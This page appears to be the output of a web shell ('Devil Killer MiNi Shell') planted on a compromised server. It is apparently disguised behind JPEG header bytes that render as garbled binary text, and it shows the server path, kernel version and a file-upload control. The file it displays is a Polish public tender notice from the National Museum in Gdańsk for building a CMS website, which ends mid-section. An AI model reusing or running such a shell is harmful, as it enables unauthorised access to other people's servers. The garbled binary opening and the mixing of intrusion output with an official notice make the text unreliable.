JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250305/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250305/0013295301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie na podstawie istniejącego projektu graficznego i UX oraz uruchomienie na serwerze Zamawiającego responsywnego Portalu internetowego dla Muzeum Narodowego w Gdańsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM NARODOWE W GDAŃSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 524049578</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Toruńska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-822</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@mng.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mng.gda.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie na podstawie istniejącego projektu graficznego i UX oraz uruchomienie na serwerze Zamawiającego responsywnego Portalu internetowego dla Muzeum Narodowego w Gdańsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f5a82010-ff00-4827-a79e-e4a2fed6e147</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00132953</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00680275/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wykonanie zgodnie z istniejącym projektem graficznym i UX, a także uruchomienie na serwerze Zamawiającego, responsywnego Portalu internetowego dla Muzeum Narodowego w Gdańsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://muzeumnarodowe-gdansk.ezamawiajacy.pl/pn/muzeumnarodowe-gdansk/demand/193024/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://muzeumnarodowe-gdansk.ezamawiajacy.pl/pn/muzeumnarodowe-gdansk/demand/193024/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacja o sposobie porozumiewania się z wykonawcami<br/>1.	W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej.<br/>2.	Pytania do SWZ należy zadawać za pośrednictwem platformy zakupowej zamawiającego przez link: https://muzeumnarodowe-gdansk.ezamawiajacy.pl/pn/muzeumnarodowe-gdansk/demand/193024/notice/public/details w sekcji „Korespondencja”. Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem.<br/>3.	Oferta wraz z załącznikami musi być złożona w postaci elektronicznej w systemie informatycznym dostępnym pod adresem https://muzeumnarodowe-gdansk.ezamawiajacy.pl/pn/muzeumnarodowe-gdansk/demand/193024/notice/public/details .<br/><br/>4.	Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową zamawiającego, opisane zostały w Instrukcji dla wykonawców która jest udostępniana na platformie zakupowej zamawiającego.<br/>5.	Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z wykonawcami<br/>Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty wymaga do Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym pod adresem https://muzeumnarodowe-gdansk.ezamawiajacy.pl, zgodnie z poniższą kolejnością. Rejestracja konta następuje automatycznie poprzez: podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym) lub kontakt z numerem telefonu podanym w potwierdzeniu lub jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych. Mając to na uwadze, zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca biorący udział w postępowaniu prowadzonym drogą elektroniczną w systemie zakłada konto, wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. Po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>6.	Zamawiający wskazuje informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych, dotyczące systemu dostępnego pod adresem https://muzeumnarodowe-gdansk.ezamawiajacy.pl:<br/><br/> •	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/> •	Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/> •	Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/> •	Włączona obsługa JavaScript;<br/> •	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Na podstawie art. 19 ust. 1 PZP w związku z art. art.<br/>13 ust. 1-3 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych), dalej „RODO”, Zamawiający informuje, że:<br/>1.1. administratorem Państwa danych osobowych jest Muzeum Narodowe w Gdańsku<br/>1.2. administrator wyznaczył Inspektora Danych Osobowych, adres e-mail: iod@mng.gda.pl<br/>1.3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego, które jest prowadzone w trybie podstawowym;<br/>1.4. odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 PZP;<br/>1.5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy (art. 78 ust. 4 PZP);<br/>1.6. obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem określonym w<br/>przepisach PZP, związanym z udziałem w niniejszym postępowaniu;<br/>1.7. w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do<br/>postanowień art. 22 RODO;<br/>1.8. posiadają Państwo:<br/>1.8.1. zgodnie z art. 15 RODO – prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy<br/>skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać<br/>zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia);<br/>1.8.2. zgodnie z art. 16 RODO – prawo do sprostowania Państwa danych osobowych (z tym, że skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu z postępowania oraz załączników do niego);<br/>1.8.3. zgodnie z art. 18 RODO – prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie Państwa<br/>danych osobowych narusza przepisy RODO;<br/>1.9 nie przysługuje Państwu:<br/>1.9.1. zgodnie z art. 17 ust. 3 lit. b, d lub e RODO – prawo do usunięcia danych osobowych;<br/>1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>1.9.3. zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Państwa danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/DIM/U/1/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia<br/>Przedmiotem zamówienia jest wykonanie oraz uruchomienie na serwerze Zamawiającego responsywnego Portalu internetowego dla Muzeum Narodowego w Gdańsku w dwóch wersjach językowych pod adresem mng.gda.pl oraz zamówienie usługi zapewnienia serwisu technicznego tego Portalu przez okres zadeklarowany w ofercie.<br/>Zamawiający ma mieć możliwość zarządzania treścią strony, jej całą zawartością i strukturą poprzez System CMS tj. bieżące aktualizowanie, dodawanie, zmienianie treści, modułową rozbudowę strony, zarówno poprzez poszerzenie o dodatkowe działy i podstrony, jak również poprzez dodawanie, usuwanie, podmianę załączników w postaci plików oraz materiałów graficznych i multimedialnych.<br/>Portal zastąpi aktualnie funkcjonującą pod tym adresem stronę internetową. <br/><br/>2. Funkcjonalności<br/><br/>2.1. Układ i projekt graficzny<br/>2.1.1.	Wykonanie responsywnego Portalu internetowego zgodnie z dostarczoną przez Zamawiającego strukturą i projektem graficznym zrealizowanym w aplikacji Figma.<br/>2.1.2.	Dostosowanie układu dla rozdzielczości pośrednich w oparciu o istniejące projekty graficzne dla rozdzielczości DESKTOP i MOBILE.<br/>2.1.3.	Zbudowanie odpowiedniej struktury podstron całego Portalu z wypełnieniem przykładowymi treściami graficznymi i tekstowymi.<br/>2.1.4.	Portal zostanie wyposażony w indywidualną i zgodną z projektem stronę błędu 404.<br/><br/>2.2. Formularze<br/>2.2.1.	System CMS zostanie wyposażony w komponent umożliwiający generowanie formularzy kontaktowych/zgłoszeniowych możliwych do własnoręcznej edycji przez Redaktora oraz ich umieszczania w postach i podstronach (przy pomocy modułu lub shortcode). Formularze zostaną zabezpieczone antyspamowo poprzez CAPTCHA. <br/><br/>2.3. Wyszukiwarka<br/>2.3.1.	Portal zostanie wyposażony w wyszukiwarkę umożliwiającą wyszukiwanie wskazanej treści przez odwiedzającego.<br/><br/>2.4. Wersje językowe<br/>2.4.1.	W Portalu zostaną zakodowane dwie wersje językowe (polska i angielska), tłumaczenia zostaną dostarczone przez Zamawiającego. System CMS ma umożliwiać dowolną edycję wszystkich elementów tekstowych tworzących treści obu wersji językowych.<br/><br/>2.5. Integracje<br/>2.5.1.	Integracja Systemu CMS z YouTube (umożliwiająca dodawanie filmów poprzez moduł lub shortcode w postach oraz podstronach Portalu) oraz mediami społecznościowymi (umieszczenie łączy do serwisów społecznościowych w miejscach zgodnych z projektem graficznym).<br/>2.5.2.	Integracja z newsletterem, Google Analytics, META, a także: Biuletynem Informacji Publicznej (BIP) w postaci linku do zewnętrznej strony.<br/><br/>2.6. Dostępność i wydajność<br/>2.6.1.	Portal musi być zgodny ze standardem WCAG 2.1 na poziomie co najmniej AA dla systemów teleinformatycznych w zakresie dostępności dla osób niepełnosprawnych zgodnie z Ustawą z dnia 4 kwietnia 2019 r. o dostępności cyfrowej stron internetowych i aplikacji mobilnych podmiotów publicznych (Dz. U. poz. 848) oraz jej zmianami z dnia 17 kwietnia 2023 r. <br/>2.6.2.	Portal zostanie zoptymalizowany w taki sposób, aby jego wskaźnik Google Page Speed Insights wynosił minimum 80/100 (dla urządzeń typu desktop oraz mobile).<br/>2.6.3.	Maksymalny czas ładowania kluczowych podstron nie może przekroczyć 4 sekund. <br/><br/>2.7. Optymalizacja i SEO<br/>2.7.1.	Portal zostanie wyposażony w mechanizm automatycznej kompresji plików graficznych w momencie ich wprowadzania do Systemu CMS (maksymalna długość większego boku dla plików graficznych wyniesie 2048 px oraz jakość plików na poziomie 70/100).<br/>2.7.2.	Wykorzystanie plików SVG dla kluczowych elementów Portalu (np.: logotypy, kształty ilustracyjne).<br/>2.7.3.	Fonty wykorzystane na stronie internetowej będą ładowane lokalnie z serwera Zamawiającego.<br/>2.7.4.	Portal zostanie zakodowany zgodne z zasadami SEO oraz będzie umożliwiał wprowadzanie elementów SEO, takich jak: ALT, TITLE oraz tytułu SEO i słów kluczowych dla postu lub podstrony, uwzględniając poprawne wyświetlanie postów i podstron w social mediach (Facebook, Instagram, Youtube, LinkedIn).<br/>2.7.5.	Podstrony oraz elementy graficzne Portalu będą oznaczone odpowiednimi znacznikami zgodnie z wytycznymi SEO, co pozwoli na zwiększenie widoczności i efektywności w wynikach wyszukiwania.<br/><br/>2.8. Zarządzanie treścią<br/>2.8.1.	Portal zostanie zbudowany w oparciu o aktualnie rozwijany System CMS typu open source umożliwiający logowanie do zaplecza z poziomu przeglądarki internetowej oraz będzie posiadał interfejs w języku polskim.<br/>2.8.2.	System CMS zostanie wyposażony w edytor WYSIWYG dający możliwość formatowania treści, tworzenia tabel, linków oraz wstawiania grafik i elementów multimedialnych.<br/>2.8.3.	System CMS zostanie wyposażony w stopniowany dostępu dla osób zarządzających (role: Redaktor, Admin).<br/>2.8.4.	Podczas edycji postów oraz podstron Redaktor będzie miał możliwość bezpośredniego kopiowania treści z pakietu MS Office z zachowaniem formatowania źródłowego.<br/>2.8.5.	System CMS powinien automatycznie generować mapę witryny (sitemap) - dynamicznie tworząc mapę Portalu.<br/>2.8.6.	System CMS będzie obsługiwał wersjonowanie edytowanej zawartości treści postów oraz podstron, wraz z możliwością przywrócenia ich poprzednich wersji.<br/><br/>3. Wymagania techniczne<br/><br/>3.1. Technologia i struktura<br/>3.1.1	Portal zostanie wykonany w oparciu o minimalną wersję PHP: 8.2.<br/>3.1.2	Portal zostanie oparty na współcześnie rozwijanym Systemie CMS typu open source.<br/>3.1.3	Zapewnione zostanie poprawne funkcjonowanie Portalu internetowego we wszystkich popularnych przeglądarkach: Chrome, Firefox, Safari, Edge, Opera (oraz ich odpowiednikach mobilnych na Systemach Android oraz iOS).<br/>3.1.4	Kodowanie polskich znaków według standardu UTF-8.<br/>3.1.5	Portal zawierać będzie komponent ciasteczkowy zgodny z Google Consent Mode v2.<br/>3.1.6	Portal zostanie zakodowany zgodnie ze standardami W3C: HTML 5, CSS 3.<br/><br/>3.2.	Bezpieczeństwo<br/>3.2.1.	Portal zostanie wyposażony w dostęp oparty o uwierzytelnienie dwuskładnikowe podczas logowania do zaplecza Systemu CMS.<br/>3.2.2.	Wykonawca zobowiązuje się do utrzymania bezpieczeństwa Portalu internetowego przez okres zadeklarowany w ofercie.<br/>3.2.3.	W Systemie CMS znajdzie się komponent umożliwiający wykonywanie kopii zapasowych całego Portalu (baza danych + pliki Portalu).<br/><br/>3.3.	Wsparcie techniczne<br/>3.3.1.	Wykonawca oferuje wykonywanie bieżących aktualizacji Systemu CMS i komponentów do najnowszych wersji (4 razy do roku).<br/>3.3.2.	Wykonawca zobowiązuje się do dokonania dodatkowych zmian na portalu www w ramach zadeklarowanej w ofercie liczby roboczogodzin, w okresie zadeklarowanej w ofercie gwarancji. <br/><br/>4. Dokumentacja i szkolenie<br/><br/>4.1. Szkolenie<br/>4.1.1.	Wykonawca zobowiązuje się do przeprowadzenia szkolenia z obsługi Systemu CMS dla zespołu od 5 do 15 osób, wydelegowanego przez Zamawiającego.<br/><br/>4.2. Dokumentacja<br/>4.2.1.	Wykonawca zobowiązuje się do przygotowania instrukcji obsługi Systemu CMS zawierającej najważniejsze tematy związane z jego obsługą.<br/>4.2.2.	Wykonawca zobowiązuje się przygotować opis techniczny dla Redaktorów (zawierający najważniejsze i zalecane parametry techniczne dla grafik, długości nagłówków i wstępów do postów). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72260000-5 - Usługi w zakresie oprogramowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72212224-5 - Usługi opracowywania oprogramowania do edycji stron WWW</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>13.1. Przedmiotem zamówienia będzie rozszerzenie funkcjonalności budowanej strony internetowej o moduł profesjonalnego sklepu internetowego. Zautomatyzowany moduł sklepu zastąpi zbudowaną w ramach pierwszej części zamówienia podstronę, której funkcjonalność będzie polegała na możliwości zapoznania się z wydawnictwami muzealnymi i złożenia zamówienia mailowego. Warunki udzielenia zamówienia w zakresie odbioru, kar umownych i współpracy pomiędzy Wykonawcą a Zamawiającym będą analogiczne do zapisanych we wzorze umowy. Wynagrodzenie będzie iloczynem liczby godzin potrzebnych do realizacji zamówienia i stawki godzinowej zaproponowanej w ofercie (zamówienie podstawowe) z uwzględnieniem kombinacji wskaźników wzrostu cen i wynagrodzenia minimalnego. <br/>13.2. Zamawiający daje sobie możliwość przedłużenia umowy w zakresie świadczenia usług i utrzymania serwisu na kolejny okres. Warunki udzielenia zamówienia w zakresie kar umownych i współpracy pomiędzy Wykonawcą a Zamawiającym będą analogiczne do zapisanych we wzorze umowy. Wynagrodzenie będzie bazowało na analogicznym wynagrodzeniu zaproponowanym w ofercie (zgodnie z rozdz. 19, ust. 3) z uwzględnieniem kombinacji wskaźników wzrostu cen i wynagrodzenia minimalnego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. 